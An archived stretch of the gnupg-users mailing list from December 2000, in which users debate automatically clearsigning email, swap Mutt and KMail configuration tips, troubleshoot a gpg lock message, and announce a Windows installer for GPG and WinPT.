http://www.gnupg.org iEYEARECAAYFAjo46WoACgkQ+bU2CMlTTuqQiACdHvFst82vDWiK+kky5sKIZaRz BgUAn1iInOMK99k9ui/+AH05JzTSTMVP =/Xr5 -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Thu Dec 14 16:18:17 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Thu, 14 Dec 2000 16:18:17 +0000 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214093003.C7654@berbee.com>; from walton@berbee.com on Thu, Dec 14, 2000 at 09:30:03AM -0600 References: <20001214093003.C7654@berbee.com> Message-ID: <20001214161817.B10991@nmrc.ie> walton@berbee.com writes: > Hi, > I would first like to thank Graham, Brian, and Andrew for their responses to my question regarding clearsigning my emails. As you can see, this message is clearsigned. Please trim your lines to 72-76 chars per line. Thank you. IMHO signing list email is a useless and wasteful exercise, especially if the sender hasn't submitted his/her keys to the public keyservers. In this situation, those who have configured their encrytion software to automatically import keys from these servers are penalised. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From dgc@uchicago.edu Thu Dec 14 17:03:13 2000 From: dgc@uchicago.edu (David Champion) Date: Thu, 14 Dec 2000 11:03:13 -0600 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214161817.B10991@nmrc.ie>; from lhecking@nmrc.ie on Thu, Dec 14, 2000 at 04:18:17PM +0000 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> Message-ID: <20001214110313.C1032@smack.uchicago.edu> On 2000.12.14, in <20001214161817.B10991@nmrc.ie>, "Lars Hecking" wrote: > > IMHO signing list email is a useless and wasteful exercise, especially > if the sender hasn't submitted his/her keys to the public keyservers. > In this situation, those who have configured their encrytion software > to automatically import keys from these servers are penalised. This has come up before in my conversation with others. I think that signing all mail as a policy is a waste of resources and a potential source of annoyance, whether it's list mail or not. I think that sensitive material (code patches, or authoritative announcements of new software releases, or analyses of the latest Communications Prohibition Act, and the like) ought to be signed if possible; anyone who is concerned about the validity of the message can check the signature if they like. But, by and large, it doesn't matter. I don't really care whether it was really the person I know as Lars Hecking who wrote the message I'm replying to right now. It only matters what's said in this case, and not much who said it. If I want to confirm all this, I can write to Lars and he can sign it. If I sign my mail to Lars, he'll quite possibly even sign his reply. But chances are exceedingly small that any given item of information really needs to be corroborated. Since PGP became available, I've been asked only a handful of times to resend something with a signature. I'm reluctant to believe that's only because people don't know that I have a signing key. Having the signatures come up, and my mailer and OpenPGP client freeze while I wait to download a signature that might and might not be on the server that I use, only to discover that the signed material doesn't even need validation, is somewhat irritating at times - semi-political privacy agenda or no. -- -D. dgc@uchicago.edu NSIT University of Chicago -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 14 17:08:48 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 14 Dec 2000 18:08:48 +0100 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214161817.B10991@nmrc.ie>; from lhecking@nmrc.ie on Thu, Dec 14, 2000 at 04:18:17PM +0000 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> Message-ID: <20001214180848.K23140@gnupg.de> On Thu, 14 Dec 2000, Lars Hecking wrote: > IMHO signing list email is a useless and wasteful exercise, especially > if the sender hasn't submitted his/her keys to the public keyservers. Well, that depends on the content of the mail. But you are right, for the bulk of ML traffic, there is no need for signing. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 14 17:24:10 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 14 Dec 2000 18:24:10 +0100 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214110313.C1032@smack.uchicago.edu>; from dgc@uchicago.edu on Thu, Dec 14, 2000 at 11:03:13AM -0600 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214110313.C1032@smack.uchicago.edu> Message-ID: <20001214182410.L23140@gnupg.de> On Thu, 14 Dec 2000, David Champion wrote: > Having the signatures come up, and my mailer and OpenPGP client freeze > while I wait to download a signature that might and might not be on the And on a slow box (mine) it even freezes during signature verification. It would be much better if Mutt has an option to check signatures on demand and not every time you open that message. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Nils@infosun.fmi.uni-passau.de Thu Dec 14 17:45:37 2000 From: Nils@infosun.fmi.uni-passau.de (Nils Ellmenreich) Date: Thu, 14 Dec 2000 18:45:37 +0100 (CET) Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214161817.B10991@nmrc.ie> References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> Message-ID: <14905.1857.278559.225569@barber.fmi.uni-passau.de> >>>"LH" == Lars Hecking writes: LH> walton@berbee.com writes: >> Hi, >> I would first like to thank Graham, Brian, and Andrew for their >> responses to my question regarding clearsigning my emails. As you >> can see, this message is clearsigned. LH> IMHO signing list email is a useless and wasteful exercise, especially ... I fail to see why anyone would want to automatically sign all mails. The act of signing means something like "I have read/written the above. I agree with this. To certify this fact, I hereby sign it." That means: signing has to be a conscious act. If it's done automatically, it's not conscious and the signature loses its meaning ... Just my thoughts, Nils -- Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From evangelo@pigdog.org Thu Dec 14 17:48:31 2000 From: evangelo@pigdog.org (ESP) Date: 14 Dec 2000 09:48:31 -0800 Subject: Question regarding clearsigning emails automatically In-Reply-To: David Champion's message of "Thu, 14 Dec 2000 11:03:13 -0600" References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214110313.C1032@smack.uchicago.edu> Message-ID: <87d7euzyfk.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 >>>>> "DC" == David Champion writes: DC> This has come up before in my conversation with others. I DC> think that signing all mail as a policy is a waste of DC> resources and a potential source of annoyance, whether it's DC> list mail or not. What resources, exactly? Randomness? Or maybe you think the 100-byte overhead per message is too much for the delicate network infrastructure of the Innurnet? DC> I think that sensitive material (code patches, or DC> authoritative announcements of new software releases, or DC> analyses of the latest Communications Prohibition Act, and the DC> like) ought to be signed if possible; anyone who is concerned DC> about the validity of the message can check the signature if DC> they like. One value of signatures that you didn't point out is establishing identity for people who don't meet face to face. When you get an email from me in two months asking for a loan of $10,000, you'll know that it was the same guy who sent a gnupg-users list email in Dec 2000, since the signatures will be the same. Do you need to know who I am now? No. Will you need to know in the future? Maybe. Lastly, that semi-political agenda you mentioned? It's worthwhile. Making signatures and encryption a part of everyday usage is valuable. ~ESP - -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ESP | http://pigdog.org/ "Fan belts break at 3AM. I get mad, drinks get spilled." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) iD8DBQE6OQflbZezvPSYodkRAuGSAJ0Yr7/6LVsLTIpvXF5Zt4MHms/i9gCeOzS1 fej+QdYYDeqrL67qMFUOKVE= =sL6H -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ccurley@trib.com Thu Dec 14 18:05:58 2000 From: ccurley@trib.com (Charles Curley) Date: Thu, 14 Dec 2000 11:05:58 -0700 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214182410.L23140@gnupg.de>; from wk@gnupg.org on Thu, Dec 14, 2000 at 06:24:10PM +0100 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214110313.C1032@smack.uchicago.edu> <20001214182410.L23140@gnupg.de> Message-ID: <20001214110558.A20973@trib.com> --9jxsPFA5p3P2qPhR Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Dec 14, 2000 at 06:24:10PM +0100, Werner Koch muttered: > On Thu, 14 Dec 2000, David Champion wrote: >=20 > > Having the signatures come up, and my mailer and OpenPGP client freeze > > while I wait to download a signature that might and might not be on the >=20 > And on a slow box (mine) it even freezes during signature > verification. It would be much better if Mutt has an option to check > signatures on demand and not every time you open that message. Try: set pgp_verify_sig=3Dask-yes --=20 -- C^2 No windows were crashed in the making of this email. Looking for fine software and/or web pages? http://w3.trib.com/~ccurley --9jxsPFA5p3P2qPhR Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6OQwG//ZMSE7N39sRAm4YAJ9pBkGHc/eT9WphWRQbzsELp9+q0QCgm74r mlvESaUR383fPs43kWPNPDQ= =CzDA -----END PGP SIGNATURE----- --9jxsPFA5p3P2qPhR-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andrew@mcdonald.org.uk Thu Dec 14 18:54:08 2000 From: andrew@mcdonald.org.uk (Andrew McDonald) Date: Thu, 14 Dec 2000 18:54:08 +0000 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214182410.L23140@gnupg.de>; from wk@gnupg.org on Thu, Dec 14, 2000 at 06:24:10PM +0100 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214110313.C1032@smack.uchicago.edu> <20001214182410.L23140@gnupg.de> Message-ID: <20001214185408.A688@mcdonald.org.uk> On Thu, Dec 14, 2000 at 06:24:10PM +0100, Werner Koch wrote: > On Thu, 14 Dec 2000, David Champion wrote: > > > Having the signatures come up, and my mailer and OpenPGP client > > freeze while I wait to download a signature that might and might > > not be on the > > And on a slow box (mine) it even freezes during signature > verification. It would be much better if Mutt has an option to check > signatures on demand and not every time you open that message. This extract is from the mutt manual. Doesn't this do what you want? 6.3.113. pgp_verify_sig Type: quadoption Default: yes If "Yes", always attempt to verify PGP/MIME signatures. If "Ask", ask whether or not to verify the signature. If "No", never attempt to verify PGP/MIME signatures. Andrew -- Andrew McDonald E-mail: andrew@mcdonald.org.uk http://www.mcdonald.org.uk/andrew/ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Thu Dec 14 19:02:58 2000 From: rich@cnylug.org (Rich) Date: Thu, 14 Dec 2000 14:02:58 -0500 Subject: majordomo? Message-ID: <3A391962208.0E19RICH@mail.dreamscape.com> Is majordomo@gnupg.org working? Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Thu Dec 14 19:05:38 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Thu, 14 Dec 2000 19:05:38 +0000 Subject: majordomo? In-Reply-To: <3A391962208.0E19RICH@mail.dreamscape.com>; from rich@cnylug.org on Thu, Dec 14, 2000 at 02:02:58PM -0500 References: <3A391962208.0E19RICH@mail.dreamscape.com> Message-ID: <20001214190538.C11831@nmrc.ie> Rich writes: > Is majordomo@gnupg.org working? IIRC this list doesn't run on majordomo. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andrew@mcdonald.org.uk Thu Dec 14 19:10:17 2000 From: andrew@mcdonald.org.uk (Andrew McDonald) Date: Thu, 14 Dec 2000 19:10:17 +0000 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001213230627.26F3.GRAHAM@todd276.worldonline.co.uk>; from graham@todd276.worldonline.co.uk on Wed, Dec 13, 2000 at 11:16:46PM +0000 References: <20001213143655.B31330@berbee.com> <20001213214101.A264@mcdonald.org.uk> <20001213230627.26F3.GRAHAM@todd276.worldonline.co.uk> Message-ID: <20001214191017.B688@mcdonald.org.uk> On Wed, Dec 13, 2000 at 11:16:46PM +0000, Graham wrote: > AM> These work, but are a bit of a cludge compared to mutt's proper PGP > AM> support. > This implies Mutt invokes PGP "properly" by PGP/MIME and earlier in > your posting you referred to "broken mailers" that clearsigned text. PGP/MIME has advantages over the older application/pgp format, and it would be nice to see it supported by all the mailers that offer "pgp support". The pgp/mime standard in rfc2015 is 4 years old, and lots of MUAs seem to support S/MIME. :) RFC 2440, does after all say: "An application that implements OpenPGP for messaging SHOULD implement OpenPGP-MIME." (See RFC2119 for the meaning of 'SHOULD'). "broken mailers" really referred to Microsoft Outlook, which I get annoyed with for many reasons (and, yes, I do use it at work :( ). That particular comment in my .muttrc came about after getting frustrated trying to send a message to an Outlook user that they could easily decrypt/verify. This process involved PGP/MIME, then application/pgp and finally this macro which implements application/pgp-but-the-content-type-says-text/plain. This, however, is probably due to problems trying to plug PGP support into Outlook. :-) By terming my macros "a bit of a cludge". I meant that mutt's PGP/MIME support was so nice, easy and clean to use; using these macros seem very horrible in comparison. :( Andrew -- Andrew McDonald E-mail: andrew@mcdonald.org.uk http://www.mcdonald.org.uk/andrew/ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Thu Dec 14 19:36:33 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Thu, 14 Dec 2000 19:36:33 GMT Subject: question regarding gnupg in my regular signature In-Reply-To: <20001214191017.B688@mcdonald.org.uk> References: <20001213230627.26F3.GRAHAM@todd276.worldonline.co.uk> <20001214191017.B688@mcdonald.org.uk> Message-ID: <20001214192642.18E1.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Andrew McDonald, On 14 December 2000, I received the following message from you regarding "question regarding gnupg in my regular signature" AM> On Wed, Dec 13, 2000 at 11:16:46PM +0000, Graham wrote: AM> > AM> These work, but are a bit of a cludge compared to mutt's proper PGP AM> > AM> support. AM> AM> > This implies Mutt invokes PGP "properly" by PGP/MIME and earlier in AM> > your posting you referred to "broken mailers" that clearsigned text. AM> AM> PGP/MIME has advantages over the older application/pgp format, and it AM> would be nice to see it supported by all the mailers that offer "pgp AM> support". The pgp/mime standard in rfc2015 is 4 years old, and lots of AM> MUAs seem to support S/MIME. :) AM> RFC 2440, does after all say: "An application that implements OpenPGP AM> for messaging SHOULD implement OpenPGP-MIME." (See RFC2119 for the AM> meaning of 'SHOULD'). You're probably right, but specifically what advantages? AM> "broken mailers" really referred to Microsoft Outlook, which I get AM> annoyed with for many reasons (and, yes, I do use it at work :( ). Same here! AM>That AM> particular comment in my .muttrc came about after getting frustrated AM> trying to send a message to an Outlook user that they could easily AM> decrypt/verify. This process involved PGP/MIME, then application/pgp AM> and finally this macro which implements AM> application/pgp-but-the-content-type-says-text/plain. This, however, is AM> probably due to problems trying to plug PGP support into Outlook. :-) PGP has a plug-in which integrates more seamlessly with Outlook than Eudora or Outlook Express. The problem I would think is that you're trying to get a MUA (Mutt) which defaults to PGP/MIME under Linux, to produce something which can be understood by a Windows application (Outlook) for which there is no PGP/MIME support. Despite somebody telling me that this difference is not an OS problem, but an application problem, most Windows MUAs do not have PGP/MIME support if they have PGP. AM> By terming my macros "a bit of a cludge". I meant that mutt's PGP/MIME AM> support was so nice, easy and clean to use; using these macros seem AM> very horrible in comparison. :( I understand that, but for we Windows users, PGP/MIME seems so unwieldy, so non-standard, and suspicious as we try to avoid attachments.... Its just your point of view.... Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 14 December 2000 19:26:42 -----BEGIN PGP SIGNATURE----- Version: PGPB2 version 0.01.3 iQA/AwUBOjkhNi7i2PqZ2xC9EQKXgACggoDCU0gVnL/Xkurp45GUKPOZwtUAni70 H3K0HRFDDAV7o9btTYwsjnK+ =O+aG -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From davidtg@bigfoot.com Thu Dec 14 20:00:49 2000 From: davidtg@bigfoot.com (David T-G) Date: Thu, 14 Dec 2000 15:00:49 -0500 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001214092506.B7654@berbee.com>; from bryan@bryansweb.com on Thu, Dec 14, 2000 at 09:25:06AM -0600 References: <20001213124142.C31174@berbee.com> <200012131842.eBDIg2Y05044@mail.hsp.de> <20001213124440.D31174@berbee.com> <200012131845.eBDIj0705197@mail.hsp.de> <20001213133740.A31330@berbee.com> <20001214092506.B7654@berbee.com> Message-ID: <20001214150049.D2450@sector13.org> --2Z2K0IlrPCVsbNpk Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Bryan, et al -- =2E..and then Bryan K. Walton said... % Hi, % I would first like to thank Graham, Brian, and Andrew for their response= s to my question regarding clearsigning my emails. As you can see, this me= ssage is clearsigned. You may have intended for it to be clearsigned, but it was in fact simply not signed at all. % Now, I what I would like to do is configure Mut so that it will clearsig= n automatically. I know there is a way to autosign in PGP/MIME format. Bu= t I am having trouble getting it to autosign in clearsign format. I am usi= ng Mutt 1.2.5i. I tried adding "set pgp_create_traditional=3Dyes" to my .m= uttrc but that didn't work. I am also sending this message to the mutt-use= rs list. Do you have any hooks which might reset that to "no"? Have you, in fact, managed to clearsign a message other than this attempt? Just in case you haven't tried it, compose your message and then, from mutt's compose window before you go to send it, enter :set ?pgp_create_traditional and see what it says. If it doesn't set yes, then set it to yes and *then* send it to see what you get. %=20 % Thanks! % Bryan=20 HTH & HAND :-D --=20 David T-G * It's easier to fight for one's principles (play) davidtg@bigfoot.com * than to live up to them. -- fortune cookie (work) davidtgwork@bigfoot.com http://www.bigfoot.com/~davidtg/ Shpx gur Pbzzhavpngvbaf Qrprapl Npg! --2Z2K0IlrPCVsbNpk Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6OSbwUScpmrZtnuoRAo4tAJwKs0wSyUtQSz8mc+llznKBC2TslwCeL/fE WGfyUi6J8R3rOVg90n0Jcxc= =G7f2 -----END PGP SIGNATURE----- --2Z2K0IlrPCVsbNpk-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 14 19:44:56 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 14 Dec 2000 20:44:56 +0100 Subject: majordomo? In-Reply-To: <3A391962208.0E19RICH@mail.dreamscape.com>; from rich@cnylug.org on Thu, Dec 14, 2000 at 02:02:58PM -0500 References: <3A391962208.0E19RICH@mail.dreamscape.com> Message-ID: <20001214204456.R23140@gnupg.de> On Thu, 14 Dec 2000, Rich wrote: > Is majordomo@gnupg.org working? I hope not. There should be no majordomo but a smartlist thing. I thing I removed the autoresponder which told users, that there is no Majordomo. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rodneyp@utanet.at Fri Dec 15 00:36:44 2000 From: rodneyp@utanet.at (Rod Pike) Date: Thu, 14 Dec 2000 22:36:44 -0200 Subject: Error message attempting to sign a key Message-ID: <20001214223642.A965@utanet.at> First let me thank those who responded with how to subscribe. I don't know how I missed the mailing list info under documents on the gnupg home page but I ended up on the gnu.org page and (IMHO) it's doesn't seem to be explained there very clearly. (Again I was probably looking in the wrong place) Anyway here's my question. I'm trying to sign a key using gnupg1.0.4 and I' getting the following message in a loop. gpg: waiting for lock (hold by 821 - probably dead) ... gpg: waiting for lock (hold by 821 - probably dead) ... and it goes on. Any ideas what the problem is? Cheers, Rod -- Rod Pike rodneyp @ utanet.at -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ftobin@uiuc.edu Thu Dec 14 21:38:21 2000 From: ftobin@uiuc.edu (Frank Tobin) Date: Thu, 14 Dec 2000 15:38:21 -0600 (CST) Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214182410.L23140@gnupg.de> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Werner Koch, at 18:24 +0100 on Thu, 14 Dec 2000, wrote: And on a slow box (mine) it even freezes during signature verification. It would be much better if Mutt has an option to check signatures on demand and not every time you open that message. One system that pgpenvelope adopted was the ability to check signatures through procmail; this modifies the body of the message, but one can store the original in a backup folder trivially. - -- Frank Tobin http://www.uiuc.edu/~ftobin/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: pgpenvelope 2.9.0 - http://pgpenvelope.sourceforge.net/ iEYEARECAAYFAjo5PdUACgkQVv/RCiYMT6MJqgCdGa+7jUbCyjpuaxVh6TTJRZqZ bAwAoLDmGLidia1S5IlERTxFNeXfZvWw =pWxo -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Nils@infosun.fmi.uni-passau.de Fri Dec 15 07:19:45 2000 From: Nils@infosun.fmi.uni-passau.de (Nils Ellmenreich) Date: Fri, 15 Dec 2000 08:19:45 +0100 (CET) Subject: Error message attempting to sign a key In-Reply-To: <20001214223642.A965@utanet.at> References: <20001214223642.A965@utanet.at> Message-ID: <14905.50705.757454.743776@barber.fmi.uni-passau.de> >>>"RP" == Rod Pike writes: RP> gpg: waiting for lock (hold by 821 - probably dead) ... RP> gpg: waiting for lock (hold by 821 - probably dead) ... RP> and it goes on. RP> Any ideas what the problem is? Oh yes. Read question 6.11 at http://www.gnupg.org/faq.html Cheers, Nils -- Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Nils@infosun.fmi.uni-passau.de Fri Dec 15 07:40:15 2000 From: Nils@infosun.fmi.uni-passau.de (Nils Ellmenreich) Date: Fri, 15 Dec 2000 08:40:15 +0100 (CET) Subject: Question regarding clearsigning emails automatically Message-ID: <14905.51935.249561.139579@barber.fmi.uni-passau.de> Hi Ralph, >>>"RA" == Ralph Angenendt writes: RA> Nils Ellmenreich wrote: >> act of signing means something like "I have read/written the above. I >> agree with this. To certify this fact, I hereby sign it." That means: RA> OTOH signing all mails means: "If you ever come across a mail which RA> is supposed to be written by me, but is not signed, then please call RA> me to verify that I really sent this mail. It could as well be a RA> fake". I think, the act of signing (whether email or anything else) is roughly what I wrote above. The fact that you'd like people to get in touch with you if they receive some unsigned stuff supposed to come from you - that's just your personal addition (which may be sensible, but is unrelated to the signing itself). RA> IMHO ideally all mails should be signed and all mails should be RA> encrypted. The latter normally fails, as most people are not able to RA> receive encrypted mails. That's for sure. Encrypting only the important stuff is not a good idea. But my point was not to say you shouldn't sign/encrypt all mails. Whether or not doing that is a personal preference. What I am opposing is *automatically* signing (i.e. without entering a passphrase) all mails, as some people seem to do. That is about the same as having a pile of blank stationary paper only with a signature, and using this paper to write each letter. The signature becomes almost meaningless. IIRC, the legal implication of "signing" is that someone had to take his time and, while being fully aware of the consequences, "signed" a document to tell others it's genuine. If this deliberate act is missing (because it's being done automatically) - what does a signed mail tell you? That someone used the account of John Doe's computer to write a mail with his mail client who automatically signs all mails as John Doe. And that almost meaningless ... ;-) Cheers, Nils -- Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From sienix@crosswinds.net Fri Dec 15 12:51:05 2000 From: sienix@crosswinds.net (Guy Van Sanden) Date: Fri, 15 Dec 2000 12:51:05 GMT Subject: Old subject: Kmail and gnupg Message-ID: <20001215.12510563@pcf570.atea.be> Hi I now it's an old subject, but has anyone found anything out about getting gnupg working with kmail? I've been looking around, and things don't look promising... Kind regards Guy -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Fri Dec 15 13:17:53 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Fri, 15 Dec 2000 14:17:53 +0100 Subject: Old subject: Kmail and gnupg In-Reply-To: <20001215.12510563@pcf570.atea.be> References: <20001215.12510563@pcf570.atea.be> Message-ID: <00121514175302.04817@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Friday, 15. December 2000 13:51, Guy Van Sanden wrote: > I now it's an old subject, but has anyone found anything out about > getting gnupg working with kmail? > I've been looking around, and things don't look promising... If you have problems with kmail you'd better send your questions to the KMail-Mailinglist: kmail@kde.org. What exactly is your problem? As you can see I have no problem with KMail 1.2 (KDE 2.0) and GnuPG. They work together absolutely perfect. Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6OhoCqUQWN/hplRsRAgHpAJ41r17y6yqSaUNw9sLQIJk7wsEdsACgnwb4 ZAspcoyKiLtuZ7Ni64j/+CY= =ZMmT -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jam@jamux.com Fri Dec 15 14:56:20 2000 From: jam@jamux.com (John A. Martin) Date: Fri, 15 Dec 2000 09:56:20 -0500 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214182410.L23140@gnupg.de> (Werner Koch; Thu, 14 Dec 2000 18:24:10 +0100) Message-ID: <20001215145620.1DB3F4800C@athene.jamux.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 >>>>> "WK" == Werner Koch >>>>> "Re: Question regarding clearsigning emails automatically" >>>>> Thu, 14 Dec 2000 18:24:10 +0100 WK> On Thu, 14 Dec 2000, David Champion wrote: >> Having the signatures come up, and my mailer and OpenPGP client >> freeze while I wait to download a signature that might and >> might not be on the WK> And on a slow box (mine) it even freezes during signature WK> verification. It would be much better if Mutt has an option to WK> check signatures on demand and not every time you open that WK> message. If you have had the experience of having nasty mail forged with your name and header sender information you will value the option of establishing the practice of _always_ signing your mail so that you can be more credible when you disclaim any unsigned mail attributed to you. I have also come to the opinion that signing all mail and eccrypting all private mail whose recipient will stand for it is not only wise self interest but also a boon to the cause of encouraging widespread acceptance and use of encryption. jam -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: OpenPGP encrypted mail preferred. See iEYEARECAAYFAjo6MPkACgkQUEvv1b/iXy8SdACfSF1LaIq7r7QFFkXf3xNLwjXa KhkAn37CV7j4SxoJz+3QlAKeVWFjyxMy =cgVj -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 15 15:53:50 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 15 Dec 2000 16:53:50 +0100 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001215145620.1DB3F4800C@athene.jamux.com>; from jam@jamux.com on Fri, Dec 15, 2000 at 09:56:20AM -0500 References: <20001214182410.L23140@gnupg.de> <20001215145620.1DB3F4800C@athene.jamux.com> Message-ID: <20001215165350.G26163@gnupg.de> On Fri, 15 Dec 2000, John A. Martin wrote: > If you have had the experience of having nasty mail forged with your > name and header sender information you will value the option of > establishing the practice of _always_ signing your mail so that you That's up to you. It doesn't make sense for me because I know you only from your mails and if a mail is in the same spirit I simply assume that it is you. > I have also come to the opinion that signing all mail and eccrypting > all private mail whose recipient will stand for it is not only wise > self interest but also a boon to the cause of encouraging widespread > acceptance and use of encryption. Agreed. I only wish that my friends would do so and not only the geeks ;-) Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ed@eepatents.com Fri Dec 15 17:04:23 2000 From: ed@eepatents.com (Ed Suominen) Date: Fri, 15 Dec 2000 10:04:23 -0700 Subject: Win32 Installation Package for GPG/WinPT (new) Message-ID: <5.0.2.1.0.20001215091602.028c3260@maia.netsonic.net> After searching in vain for a user-friendly alternative to command-line GPG and the increasingly commercialized PGP, I have finally cobbled together something that I think will work, at least for communications between me and and my clients and colleagues. Without modifying the source of either GPG or WinPT, I've put together an installation package that allows users to install both programs without needing to access the command prompt. (Let's face it, most people don't even know what the command prompt is nowadays.) It also allows users to encrypt and decrypt files with a simple "drag-and-drop" interface and allows generation of a key pair by filling out a text template. There is a documentation folder with the various documentation in PDF and text, including a very basic "how to" overview I've written. A performance benefit is the integration of command-line ZIP compression ("copyleft" licensed) with encryption. Compressing data before encryption makes cryptanalysis of the ciphertext much more difficult, and PGP does this automatically for that reason. The installation executable is at ftp://eepatents.com/clients/gpg32.exe. The ZIP file with the exe's contents is at ftp://eepatents.com/clients/gpg32.zip. It's somewhat thrown together as none of the source code is modified, and it is definitely not a stable release yet, but I think it will achieve the ease-of-use objective I've got in mind. While I will continue to wait for GPA, I think this will do 